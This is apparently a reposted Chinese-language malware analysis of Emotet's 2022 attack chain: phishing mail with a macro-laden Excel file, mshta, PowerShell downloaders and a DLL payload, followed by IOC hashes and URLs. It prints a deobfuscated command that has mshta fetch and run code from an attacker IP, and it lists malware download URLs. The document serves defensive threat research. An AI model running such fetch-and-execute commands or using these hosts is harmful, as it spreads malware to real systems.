惡意軟體Emotet 的新攻擊方法

安全頻道發表於2022-03-01

Emotet 曾經是惡意軟體領域的霸主,經常變換攻擊模式。在 2021 年年底,研究人員就發現 Emotet 啟用了一種新的攻擊方法。

攻擊通過帶有惡意 Excel 檔案的魚叉郵件發起,Excel 文件中包含混淆的 Excel 4.0 巨集。啟用巨集程式碼後,樣本會下載並執行一個 HTML 應用程式,再下載後續的 PowerShell 指令碼以及 Emotet 惡意樣本。

“光輝”歷史

Emotet 最早在 2014 年被發現,此後一直保持活躍。2021 年 1 月,執法機構關停了 Emotet 在全球的基礎設施。該惡意軟體一度銷聲匿跡,但在 2021 年 11 月 Emotet 正式迴歸。

Emotet 經常使用執行緒劫持發起攻擊,據此 Emotet 可以在失陷主機的 Emotet 郵件客戶端中為正常電子郵件生成偽造回覆郵件。

Emotet 自從迴歸後使用了不同的攻擊方法。2021 年 12 月,Emotet 在惡意郵件中攜帶了下載虛假的 Adobe 應用程式安裝包的惡意連結。而在 2022 年,Emotet 轉而使用帶有惡意附件的電子郵件進行攻擊。

有時候,Emotet 使用加密的 ZIP 檔案作為附件檔案。有時候,直接將 Excel 檔案作為附件。

電子郵件

Emotet 發現了一封 2021 年 6 月的電子郵件,在 2022 年 1 月 27 日傳送了一封虛假的回覆郵件。郵件帶有加密的壓縮檔案,而密碼在郵件中提供。

image.png-428.4kB電子郵件

誘餌文件

加密的壓縮檔案中包含一個帶有 Excel 4.0 巨集的 Excel 檔案,並且顯著提示使用者要啟用巨集。

image.png-143.3kB誘餌文件

巨集被啟用後,執行  cmd.exe執行  mshta.ext。利用十六進位制和字元混淆來繞過靜態檢測措施,去混淆後為  cmd /c mshta hxxp://91.240.118.168/se/s.html

image.png-90.7kB巨集程式碼

HTML 檔案是高度混淆的,執行會下載額外的 PowerShell 程式碼。

image.png-113.6kB混淆 HTML 應用程式

PowerShell

混淆的 PowerShell 指令碼通過  hxxp://91.240.118.168/se/s.png下載拉取 Emotet 的第二個 PowerShell 指令碼。

image.png-394.6kBPowerShell 程式碼

第二個 PowerShell 指令碼中包含 14 個 URL,指令碼會嘗試每個 URL 來下載 Emotet 惡意樣本。部署多個 URL 使得攻擊基礎設施的彈性更好。

image.png-606.4kB拉取流量

攻擊鏈的最後,通過 DLL 加密資源段載入 Emotet 執行。

image.png-1916.2kBEmotet 樣本

結論

Emotet 是一個高度活躍的家族,為了逃避檢測會經常變換打法。最新的攻擊鏈顯示,Emotet 會綜合使用多種型別的檔案和高度混淆的指令碼發起攻擊。

IOC

9f22626232934970e4851467b7b746578f0f149984cd0e4e1a156b391727fac9
6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88
9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1
5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed
2de72908e0a1ef97e4e06d8b1ba3dc0d76f580cdf36f96b5c919bea770b2805f
hxxp://unifiedpharma.com/wp-content/5arxM/
hxxp://hotelamerpalace.com/Fox-C404/LEPqPJpt4Gbr8BHAn/
hxxps://connecticutsfinestmovers.com/Fox-C/mVwOqxT17gVWaE8E/
hxxp://icfacn.com/runtime/n7qA2YStudp/
hxxps://krezol-group.com:443/images/PmLGLKYeCBs5d/
hxxp://ledcaopingdeng.com/wp-includes/Qq39yj7fpvk/
hxxp://autodiscover.karlamejia.com/wp-admin/hcdnVlRIiwvTVrJjJEE/
hxxps://crmweb.info:443/bitrix/rc9XjtwF/
hxxp://accessunited-bank.com/admin/hzIgVwq8btak/
hxxp://pigij.com/wp-admin/MVW5/
hxxp://artanddesign.one/wp-content/uploads/A2cZL7/
hxxp://strawberry.kids-singer.net/assets_c/WAdvNT84Dmu/
hxxps://eleccom.shop:443/services/AEjSDj/
hxxps://izocab.com/nashi-klienty/B5SC/

參考來源


來自 “ Freebuf. ”, 原文作者:Avenger;原文連結:https://www.freebuf.com/articles/network/322712.html,如有侵權,請聯絡管理員刪除。

相關文章